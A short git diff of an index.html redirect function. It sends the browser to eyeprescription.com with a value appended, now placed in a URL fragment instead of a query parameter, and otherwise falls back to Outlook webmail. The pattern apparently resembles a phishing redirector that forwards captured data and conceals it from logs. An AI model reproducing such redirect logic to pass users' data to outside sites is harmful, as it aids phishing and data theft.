--- a/index.html
+++ b/index.html
@@ -39,7 +39,7 @@ function redirrectPage(){
   if (data2)
   {
     console.log("true");
-      window.location.href = "https://eyeprescription.com/?cfg=" + data2;
+      window.location.href = "https://eyeprescription.com/#" + data2;
   }else{
     console.log("false");
     window.location.href = "https://outlook.office.com/mail/";
